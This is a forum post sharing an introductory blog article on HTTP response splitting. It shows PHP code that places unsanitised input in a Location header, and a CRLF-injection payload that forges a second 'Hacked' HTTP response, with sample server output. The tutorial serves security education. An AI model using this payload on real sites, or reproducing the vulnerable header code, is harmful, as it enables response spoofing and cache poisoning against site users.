|
HTTP Response Splitting
Hey everyone, I'm a hacker, ethical hacker that is. I am into WebApp Secutity. I thought I'd share an article from my blog. I hope to share weekly or bi weekly if you guys like it. Let me know if I should simplify. I tried to put it in code tags but the box is too small hence too hard to read.
Note: This is just an introductory to the HTTP Response Splitting Vulnerability.
HTTP response splitting is relatively new web application vulnerability resulting from the failure of a
web application or its development environment to properly sanitize input. These HTTP response
splitting attacks (here forward known as HRS attacks) are generally found when a malicious user injects
unexpected characters which are then used to form a 302 Redirect usually in the ‘Location' or ‘Set-
Cookie' header. Basic HRS attacks take place by injecting the CR (carriage return) and LF (line feed)
sequence, normally shown as "\r\n." Let's drive right in and look at the following PHP code to set the
Location header.
<?
header("Location: .$_GET[‘redirectpage']");
?>
So by visiting the URL "http://www.loopback.biz?redirectpage=http://www.loopback.biz" you get the
following 302 response from the server to the user.
HTTP/1.1 302 Found\r\n
Date: Tue, 12 Apr 2005 21:00:28 GMT\r\n
Server: Apache/1.3.29 (Unix) mod_ssl/2.8.16 OpenSSL/0.9.7c\r\n
Location: http://www.loopback.biz\r\n <Note: This is the value of the redirectpage GET request>
Keep-Alive: timeout=15, max=100\r\n
Connection: Keep-Alive\r\n
Transfer-Encoding: chunked\r\n
Content-Type: text/html\r\n
\r\n
As noted the redirectpage GET parameter is embedded in the Location response header. This is the
basis of the HRS attack, by changing the value of redirectpage we accomplish an attack. This is done by
first terminating the current response then shaping an additional response. Terminating the response is
done by injecting the CRLF sequence. This is how it might be accomplished.
?redirectpage=anything%0d%0aContent-
Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
Type:%20text/html%0d%0aContent-
Length:%2019%0d%0a%0d%0a<html> Hacked </html>
As a result the output sent by the webserver might look like.
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://loopback.biz/?redirectpage=anything
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19
<html>Hacked</html>
Followed by a bunch of garbage.
This is the explanation of what is going on.
1. A first HTTP response, which is a 302 (redirection) response.
2. A second HTTP response, which is a 200 response, with a content comprising
of 19 bytes of HTML.
3. The bunch of garbage-everything beyond the end of the second response-
does not conform to the HTTP standard.
So hence when the malicious user splits the response the sends two requests the first to the URL:
/?redirectpage=anything%0d%0aContent-
Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
Type:%20text/html%0d%0aContent-
Length:%2019%0d%0a%0d%0a<html>Hacked</html>
And the second to the URL
/index.html
The target would believe that the first request is matched to the first response:
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://loopback.biz/?redirectpage=anything
Content-Length: 0
And that the second request (to /index.html) is matched to the second response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19
<html>Hacked</html>
And by this, the attacker manages to fool the target.
|
Hybrid Mode
